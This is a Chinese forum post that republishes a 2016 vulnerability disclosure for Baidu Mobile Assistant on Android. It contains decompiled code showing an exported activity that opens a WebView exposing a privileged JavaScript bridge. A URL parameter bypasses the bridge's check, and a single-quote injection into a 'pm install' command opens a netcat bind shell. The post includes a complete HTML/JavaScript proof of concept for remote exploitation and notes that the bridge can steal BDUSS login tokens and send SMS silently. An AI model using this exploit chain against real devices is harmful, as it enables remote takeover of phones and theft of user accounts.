HanDs
管理员

[7月漏洞公开] 百度手机助手远程代码执行漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

百度手机助手某漏洞可执行任意代码,获取用户bduss等

详细说明:

百度手机助手可通过某导出组件来启动某私有组件,进而调用该组件webview中的接口。

EmptyActivity

通过设置extraction为goto_page和jump_config的type为4可启动CommonWebViewActivity并加载intent指定的url。

code 区域
intent://#Intent;S.extraction=goto_page;S.jump_config={"jump":{"type":4,"url":"**.**.**.**/baidudemo.html?ju=1","title":"title","fParam":"","filter_type":1}};SEL;component=com.baidu.appsearch/com.baidu.appsearch.EmptyActivity;end





CommonWebViewActivity的AppSearchWebView通过addJavascriptInterface添加了appclient接口。

该接口提供的方法如下

code 区域
@JavascriptInterface public boolean addCalendarRemind(String arg12) {
@JavascriptInterface @Deprecated public boolean addReminder(String arg11, long arg12, long arg14,
@JavascriptInterface public void addShortcut(String arg7, String arg8, String arg9) {
@JavascriptInterface public void appCallbackRegister(String arg3, String arg4, String arg5) {
@JavascriptInterface public boolean callTel(String arg6) {
@JavascriptInterface public void cancelDetectGyroscopeSensor() {
@JavascriptInterface public void cancelDownload(String arg10) {
@JavascriptInterface public void cancelVoiceLevel() {
@JavascriptInterface public boolean checkCreateShortcut() {
@JavascriptInterface public void copy(String arg4) {
@JavascriptInterface public void deleteShortcut(String arg4) {
@JavascriptInterface public void detectGyroscopeSensor(String arg5) {
@JavascriptInterface public boolean detectVoiceLevel(String arg7) {
@JavascriptInterface public long downloadApp(String arg12, String arg13) {
@JavascriptInterface public long downloadFile(String arg7, String arg8) {
@JavascriptInterface public void finishActivity() {
@JavascriptInterface public String getAccountInfo() {
@JavascriptInterface public String getAppInfo(String arg3, int arg4) {
@JavascriptInterface public String getAppState(String arg5) {
@JavascriptInterface @Deprecated public int getLoginState() {
@SuppressLint(value={"ServiceCast"}) @JavascriptInterface public int getMaxVolume(int arg3) {
@JavascriptInterface public int getUserRightState() {
@SuppressLint(value={"ServiceCast"}) @JavascriptInterface public int getVolume(int arg3) {
@JavascriptInterface @Deprecated public void gotoActivity(String arg6) {
@JavascriptInterface public void installApp(String arg2) {
@JavascriptInterface public boolean isAndroidEmulator() {
@JavascriptInterface public boolean isSupportGyroscopeSensor() {
@JavascriptInterface public void launchApp(String arg2) {
@JavascriptInterface public String linkTo(String arg3) {
@JavascriptInterface public void logout() {
@JavascriptInterface public boolean openAlbum() {
@JavascriptInterface public boolean openCallTel(String arg5) {
@JavascriptInterface public boolean openCamera(String arg4) {
@JavascriptInterface public boolean openMap(String arg4) {
@JavascriptInterface public boolean openSendMail(String arg5, String arg6, String arg7, String arg8) {
@JavascriptInterface public boolean openSendSMS(String arg6, String arg7) {
@JavascriptInterface public void pauseAppDownload(String arg10) {
@JavascriptInterface public void preferenceChannelSign() {
@JavascriptInterface public void receiveAward(String arg3) {
@JavascriptInterface public boolean sendSMS(String arg10, String arg11) {
@JavascriptInterface @Deprecated public void setEventCallBack(String arg2, String arg3) {
@JavascriptInterface @Deprecated public void setSetting(String arg3, boolean arg4) {
@JavascriptInterface public void setShareData(String arg2) {
@JavascriptInterface public void setShareData(String arg2, String arg3) {
@JavascriptInterface public void setShareData(String arg8, String arg9, int arg10) {
@JavascriptInterface public void setUserRightEnable(String arg2) {
@SuppressLint(value={"ServiceCast"}) @JavascriptInterface public boolean setVolume(int arg4, int
@JavascriptInterface public void showGuidePopup(String arg2) {
@JavascriptInterface public void showTitleBarShare(boolean arg3, String arg4) {
@JavascriptInterface public void softFavorites(String arg5) {
@JavascriptInterface public void softRegister(String arg5, String arg6) {
@JavascriptInterface public boolean startActivityIntent(String arg4) {
@JavascriptInterface public boolean startBroadcastIntent(String arg4) {
@JavascriptInterface public boolean startServiceIntent(String arg4) {
@JavascriptInterface @Deprecated public void toLogin() {
@JavascriptInterface public void toLogin(String arg3) {
@JavascriptInterface public long udpateApp(String arg3) {
@JavascriptInterface public void uninstallApp(String arg2) {
@JavascriptInterface public long updateApp(String arg9) {



该接口的大多数方法根据isOutUser方法的返回值是否为false来决定是否继续调用,如startServiceIntent

code 区域
@JavascriptInterface public boolean startServiceIntent(String arg4) {
boolean v0 = false;
if(!this.isOutUser()) {
try {
this.mContext.startService(Intent.parseUri(arg4, 0));
v0 = true;
}
catch(Exception v1) {
}
}

return v0;
}



查看代码发现设置url的ju参数值为1可让isOutUser方法的返回值为false

code 区域
private boolean e(String arg4) {
if(TextUtils.isEmpty(((CharSequence)arg4))) {
boolean v0 = false;
return v0;
}

String v0_1 = "http://";
Uri v0_2 = !arg4.startsWith(v0_1) ? Uri.parse(v0_1 + arg4) : Uri.parse(arg4);
try {
v0_1 = v0_2.getQueryParameter("ju");
}
catch(Exception v0_3) {
return false;
}

return !TextUtils.isEmpty(((CharSequence)v0_1)) && (v0_1.equals("1")) ? false : true;
}





@JavascriptInterface public boolean startActivityIntent(String arg4)

@JavascriptInterface public boolean startBroadcastIntent(String arg4)

@JavascriptInterface public boolean startServiceIntent(String arg4)

上面3个方法可以启动activity,service和发送广播。

通过SilentInstallService和SilentUninstallService可以静默安装和卸载app。

当没有root权限时百度手机助手会请求root权限,如果已经获取root权限则直接静默执行。



启动SilentInstallService时,从intent提取数据封装成InstallTask。

code 区域
class InstallTask {
private String a;
private String b;
private String c;

public InstallTask(Intent arg2) {
super();
this.a = arg2.getStringExtra("com.baidu.appsearch.extra.APKFILEPATH");
this.b = arg2.getStringExtra("com.baidu.appsearch.extra.APPKEY");
this.c = arg2.getStringExtra("com.baidu.appsearch.extra.APPNAME");
}

static String a(InstallTask arg1) {
return arg1.a;
}

static String b(InstallTask arg1) {
return arg1.b;
}

static String c(InstallTask arg1) {
return arg1.c;
}
}



之后调用InstallTask的a方法获取apk文件路径(v0_1),调用pm install安装apk。

code 区域
v10 = new DataOutputStream(v7);
v10.writeBytes("export LD_LIBRARY_PATH=/vendor/lib:/system/lib\n");
v10.flush();
v10.write("pm install -r \'" + v0_1 + "\'\n".getBytes("utf-8"));
v10.flush();
v10.writeBytes("exit\n");
v10.flush();
v0_6 = v5.waitFor();



通过上面的代码发现,只要闭合两边的单引号就可以注入执行任意代码,如下可执行busybox nc -ll -p 6666 -e /system/bin/sh

code 区域
intent:#Intent;package=com.baidu.appsearch;component=com.baidu.appsearch/com.baidu.appsearch.SilentInstallService;S.com.baidu.appsearch.extra.APKFILEPATH=/data/data/com.baidu.appsearch/app_greedyporter/com.baidu.yuedu.apk' && busybox nc -ll -p 6666 -e '/system/bin/sh;S.com.baidu.appsearch.extra.APPNAME=com.demo;S.com.baidu.appsearch.extra.APPKEY=com.demo;end



Screenshot_2016-04-08-22-15-48.png



2.png





通过Intent URI scheme可远程利用,POC如下。

code 区域
<html>  
<head>
<meta charset="utf-8" />
<title>DEMO</title>
</head>
<body>
<script>


location.href="intent://#Intent;S.extraction=goto_page;S.jump_config=%7B%22jump%22%3A%7B%22type%22%3A4%2C%22url%22%3A%22http%3A%2F%2F**.**.**.**%2Fbaidudemo.html?ju=1%22%2C%22title%22%3A%22title%22%2C%22fParam%22%3A%22%22%2C%22filter_type%22%3A1%7D%7D;SEL;component=com.baidu.appsearch/com.baidu.appsearch.EmptyActivity;end";
</script>
</body>
</html>



baidudemo.html

code 区域
<h1>demo</h1>
<script>
appclient.startServiceIntent("intent:#Intent;package=com.baidu.appsearch;component=com.baidu.appsearch/com.baidu.appsearch.SilentInstallService;S.com.baidu.appsearch.extra.APKFILEPATH=/data/data/com.baidu.appsearch/app_greedyporter/com.baidu.yuedu.apk' && busybox nc -ll -p 6666 -e '/system/bin/sh;S.com.baidu.appsearch.extra.APPNAME=com.demo;S.com.baidu.appsearch.extra.APPKEY=com.demo;end");
</script>





除了上面的方法,还有很多方法可以利用。

getAccountInfo可以获取用户信息,比如uid和bduss。

3.jpg



sendSMS可以用来静默发送短信。

7.0之前的版本还可以用downloadFile来自动下载安装app。

漏洞证明:

演示视频:

链接: http://**.**.**.**/s/1i5nkQnb 密码: 28d7



测试版本:

Screenshot_2016-04-08-21-17-31.png

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
百度 手机 助手 远程 代码 执行 漏洞
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复